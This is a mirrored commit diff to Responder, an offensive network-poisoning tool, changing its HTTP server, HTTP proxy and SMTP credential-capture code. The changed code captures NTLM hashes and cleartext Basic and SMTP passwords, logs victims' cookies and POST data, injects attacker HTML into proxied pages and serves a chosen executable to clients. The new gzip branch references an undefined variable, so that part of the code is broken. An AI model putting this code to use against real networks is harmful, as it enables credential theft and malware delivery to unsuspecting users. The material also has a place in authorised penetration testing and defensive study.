mirror of
https://github.com/lgandx/Responder.git
synced 2025-08-14 10:37:09 -07:00
Further improvements and fixes.
This commit is contained in:
jrmdev
parent
c6de2e9d3a
commit
066c15154d
19 changed files with 179 additions and 214 deletions
|
|
@ -28,7 +28,7 @@ from packets import WPADScript, ServeExeFile, ServeHtmlFile
|
|||
|
||||
|
||||
# Parse NTLMv1/v2 hash.
|
||||
def ParseHTTPHash(data,client):
|
||||
def ParseHTTPHash(data, client):
|
||||
LMhashLen = struct.unpack('<H',data[12:14])[0]
|
||||
LMhashOffset = struct.unpack('<H',data[16:18])[0]
|
||||
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
|
||||
|
|
@ -106,10 +106,10 @@ def ServeFile(Filename):
|
|||
bk.close()
|
||||
return data
|
||||
|
||||
def RespondWithFile(client, filename):
|
||||
def RespondWithFile(client, filename, dlname=None):
|
||||
|
||||
if filename.endswith('.exe'):
|
||||
Buffer = ServeExeFile(Payload = ServeFile(filename))
|
||||
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
|
||||
else:
|
||||
Buffer = ServeHtmlFile(Payload = ServeFile(filename))
|
||||
|
||||
|
|
@ -136,14 +136,16 @@ def PacketSequence(data, client):
|
|||
NTLM_Auth = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
|
||||
Basic_Auth = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
|
||||
|
||||
# Send the .exe if needed
|
||||
# Serve the .exe if needed
|
||||
if settings.Config.Serve_Always == True or (settings.Config.Serve_Exe == True and re.findall('.exe', data)):
|
||||
return RespondWithFile(client, settings.Config.Exe_Filename)
|
||||
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
|
||||
|
||||
# Send the custom HTML if needed
|
||||
# Serve the custom HTML if needed
|
||||
if settings.Config.Serve_Html == True:
|
||||
return RespondWithFile(client, settings.Config.Html_Filename)
|
||||
|
||||
WPAD_Custom = WpadCustom(data, client)
|
||||
|
||||
if NTLM_Auth:
|
||||
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
|
||||
|
||||
|
|
@ -163,42 +165,46 @@ def PacketSequence(data, client):
|
|||
if Packet_NTLM == "\x03":
|
||||
NTLM_Auth = b64decode(''.join(NTLM_Auth))
|
||||
ParseHTTPHash(NTLM_Auth, client)
|
||||
WPAD_Custom = WpadCustom(data, client)
|
||||
|
||||
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
||||
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
||||
return WPAD_Custom
|
||||
|
||||
else:
|
||||
Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToServe)
|
||||
Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
|
||||
Buffer.calculate()
|
||||
return str(Buffer)
|
||||
|
||||
if Basic_Auth:
|
||||
elif Basic_Auth:
|
||||
ClearText_Auth = b64decode(''.join(Basic_Auth))
|
||||
|
||||
GrabURL(data, client)
|
||||
GrabHost(data, client)
|
||||
GrabCookie(data, client)
|
||||
|
||||
WPAD_Custom = WpadCustom(data,client)
|
||||
|
||||
print text("[HTTP] (Basic) Client : %s" % client)
|
||||
print text("[HTTP] (Basic) Username : %s" % ClearText_Auth.split(':')[0])
|
||||
print text("[HTTP] (Basic) Password : %s" % ClearText_Auth.split(':')[1])
|
||||
WriteData(settings.Config.HTTPBasicLog % client, ClearText_Auth, ClearText_Auth)
|
||||
|
||||
if settings.Config.Force_WPAD_Auth and WPAD_Custom:
|
||||
print text("[HTTP] WPAD (auth) file sent to %s" % client, 3, 0)
|
||||
print text("[HTTP] WPAD (auth) file sent to %s" % client)
|
||||
return WPAD_Custom
|
||||
|
||||
else:
|
||||
Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToServe)
|
||||
Buffer = IIS_Auth_Granted(Payload=settings.Config.HTMLToInject)
|
||||
Buffer.calculate()
|
||||
return str(Buffer)
|
||||
|
||||
else:
|
||||
Response = IIS_Basic_401_Ans() if settings.Config.Basic == True else IIS_Auth_401_Ans()
|
||||
if settings.Config.Basic == True:
|
||||
Response = IIS_Basic_401_Ans()
|
||||
print text("[HTTP] Sending BASIC authentication request to %s" % client)
|
||||
|
||||
else:
|
||||
Response = IIS_Auth_401_Ans()
|
||||
print text("[HTTP] Sending NTLM authentication request to %s" % client)
|
||||
|
||||
return str(Response)
|
||||
|
||||
# HTTP Server class
|
||||
|
|
|
|||
|
|
@ -21,44 +21,19 @@ import select
|
|||
import zlib
|
||||
import BaseHTTPServer
|
||||
|
||||
from servers.HTTP import RespondWithFile
|
||||
from utils import *
|
||||
|
||||
def HandleGzip(Headers, Content, Payload):
|
||||
if len(Content) > 5:
|
||||
try:
|
||||
unziped = zlib.decompress(Content, 16+zlib.MAX_WBITS)
|
||||
except:
|
||||
return False
|
||||
def InjectData(data, client, req_uri):
|
||||
|
||||
InjectPayload = Payload
|
||||
Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
|
||||
HasBody = re.findall('(?<=<body)[^<]*', unziped)
|
||||
# Serve the .exe if needed
|
||||
if settings.Config.Serve_Always == True:
|
||||
return RespondWithFile(client, settings.Config.Exe_Filename, settings.Config.Exe_DlName)
|
||||
|
||||
if HasBody:
|
||||
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToServe, 3, 1))
|
||||
# Serve the .exe if needed and client requested a .exe
|
||||
if settings.Config.Serve_Exe == True and req_uri.endswith('.exe'):
|
||||
return RespondWithFile(client, settings.Config.Exe_Filename, os.path.basename(req_uri))
|
||||
|
||||
Content = unziped.replace("<body", settings.Config.HTMLToServe +"\n<body")
|
||||
ziped = zlib.compress(Content)
|
||||
FinalLen = str(len(ziped))
|
||||
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+FinalLen)
|
||||
return Headers+'\r\n\r\n'+ziped
|
||||
|
||||
return False
|
||||
|
||||
def InjectPage(data, client):
|
||||
if settings.Config.Exec_Mode_On_Off:
|
||||
if settings.Config.Exe_Filename.endswith('.exe'):
|
||||
buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,settings.Config.Exe_Filename),ContentDiFile=settings.Config.Exe_Filename)
|
||||
buffer1.calculate()
|
||||
return str(buffer1)
|
||||
else:
|
||||
buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,settings.Config.Exe_Filename))
|
||||
buffer1.calculate()
|
||||
return str(buffer1)
|
||||
else:
|
||||
return data
|
||||
|
||||
def InjectData(data):
|
||||
if len(data.split('\r\n\r\n')) > 1:
|
||||
try:
|
||||
Headers, Content = data.split('\r\n\r\n')
|
||||
|
|
@ -71,22 +46,30 @@ def InjectData(data):
|
|||
return data
|
||||
|
||||
if "content-encoding: gzip" in Headers.lower():
|
||||
|
||||
Gzip = HandleGzip(Headers, Content, settings.Config.HTMLToServe)
|
||||
return Gzip if Gzip else data
|
||||
Content = zlib.decompress(Content, 16+zlib.MAX_WBITS)
|
||||
|
||||
if "content-type: text/html" in Headers.lower():
|
||||
|
||||
# Serve the custom HTML if needed
|
||||
if settings.Config.Serve_Html == True:
|
||||
return RespondWithFile(client, settings.Config.Html_Filename)
|
||||
|
||||
Len = ''.join(re.findall('(?<=Content-Length: )[^\r\n]*', Headers))
|
||||
HasBody = re.findall('(?<=<body)[^<]*', Content)
|
||||
|
||||
HasBody = re.findall('(<body[^>]*>)', Content)
|
||||
|
||||
if HasBody:
|
||||
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToServe, 3, 1))
|
||||
print text("[PROXY] Injecting into HTTP Response: %s" % color(settings.Config.HTMLToInject, 3, 1))
|
||||
|
||||
NewContent = Content.replace("<body", settings.Config.HTMLToServe +"\n<body")
|
||||
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(NewContent)))
|
||||
Content = Content.replace(HasBody[0], '%s\n%s' % (HasBody[0], settings.Config.HTMLToInject))
|
||||
Headers = Headers.replace("Content-Length: "+Len, "Content-Length: "+ str(len(Content)))
|
||||
|
||||
return Headers+'\r\n\r\n'+NewContent
|
||||
if "content-encoding: gzip" in Headers.lower():
|
||||
Content = zlib.compress(lContent)
|
||||
|
||||
data = Headers +'\r\n'+ Content
|
||||
|
||||
#else:
|
||||
# print text("[PROXY] Returning unmodified HTTP response")
|
||||
|
||||
return data
|
||||
|
||||
|
|
@ -185,10 +168,8 @@ class ProxySock:
|
|||
return self.socket.recv_into(buffer, *args)
|
||||
|
||||
def send(self, *args) :
|
||||
try:
|
||||
return self.socket.send(*args)
|
||||
except:
|
||||
pass
|
||||
try: return self.socket.send(*args)
|
||||
except: pass
|
||||
|
||||
def sendall(self, *args) :
|
||||
return self.socket.sendall(*args)
|
||||
|
|
@ -224,6 +205,7 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
|
||||
def handle(self):
|
||||
(ip, port) = self.client_address
|
||||
print text("[PROXY] Received connection from %s" % self.client_address[0])
|
||||
self.__base_handle()
|
||||
|
||||
def _connect_to(self, netloc, soc):
|
||||
|
|
@ -291,8 +273,8 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
|
||||
Cookie = self.headers['Cookie'] if "Cookie" in self.headers else ''
|
||||
|
||||
print text("[PROXY] Client : %s" % color(self.client_address[0], 3, 0))
|
||||
print text("[PROXY] Requested URL : %s" % color(self.path, 3, 0))
|
||||
print text("[PROXY] Client : %s" % color(self.client_address[0], 3))
|
||||
print text("[PROXY] Requested URL : %s" % color(self.path, 3))
|
||||
print text("[PROXY] Cookie : %s" % Cookie)
|
||||
|
||||
self.headers['Connection'] = 'close'
|
||||
|
|
@ -302,8 +284,10 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
soc.send("%s: %s\r\n" % key_val)
|
||||
soc.send("\r\n")
|
||||
|
||||
try: self._read_write(soc, netloc)
|
||||
except: pass
|
||||
try:
|
||||
self._read_write(soc, netloc)
|
||||
except:
|
||||
pass
|
||||
|
||||
finally:
|
||||
soc.close()
|
||||
|
|
@ -322,18 +306,16 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
for i in ins:
|
||||
if i is soc:
|
||||
out = self.connection
|
||||
try:
|
||||
data = i.recv(8192)
|
||||
if len(settings.Config.HTMLToServe)>5:
|
||||
data = InjectData(data)
|
||||
else:
|
||||
data = InjectPage(data,self.client_address[0])
|
||||
|
||||
except:
|
||||
pass
|
||||
#try:
|
||||
data = i.recv(4096)
|
||||
if len(data) > 1:
|
||||
data = InjectData(data, self.client_address[0], self.path)
|
||||
#except:
|
||||
# pass
|
||||
else:
|
||||
out = soc
|
||||
data = i.recv(8192)
|
||||
data = i.recv(4096)
|
||||
|
||||
if self.command == "POST":
|
||||
print text("[PROXY] POST Data : %s" % data)
|
||||
if data:
|
||||
|
|
@ -350,4 +332,4 @@ class HTTP_Proxy(BaseHTTPServer.BaseHTTPRequestHandler):
|
|||
do_HEAD = do_GET
|
||||
do_POST = do_GET
|
||||
do_PUT = do_GET
|
||||
do_DELETE=do_GET
|
||||
do_DELETE=do_GET
|
||||
|
|
@ -1,3 +1,19 @@
|
|||
#!/usr/bin/env python
|
||||
# This file is part of Responder
|
||||
# Original work by Laurent Gaffie - Trustwave Holdings
|
||||
#
|
||||
# This program is free software: you can redistribute it and/or modify
|
||||
# it under the terms of the GNU General Public License as published by
|
||||
# the Free Software Foundation, either version 3 of the License, or
|
||||
# (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful,
|
||||
# but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||
# GNU General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program. If not, see <http://www.gnu.org/licenses/>.
|
||||
import os
|
||||
import settings
|
||||
|
||||
|
|
@ -27,12 +43,11 @@ class ESMTP(BaseRequestHandler):
|
|||
|
||||
if data:
|
||||
Password = b64decode(data[:len(data)-2])
|
||||
Outfile = os.path.join(settings.Config.ResponderPATH, 'logs', "SMTP-Clear-Text-Password-%s.txt" % self.client_address[0])
|
||||
WriteData(Outfile,Username+":"+Password, Username+":"+Password)
|
||||
|
||||
print text("[SMTP] Address : %s" % color(self.client_address[0], 3, 0))
|
||||
print text("[SMTP] Username : %s" % color(Username, 3, 0))
|
||||
print text("[SMTP] Password : %s" % color(Password, 3, 0))
|
||||
WriteData(settings.Config.SMTPClearLog % self.client_address[0], Username+":"+Password, Username+":"+Password)
|
||||
|
||||
## FIXME: Close connection properly
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue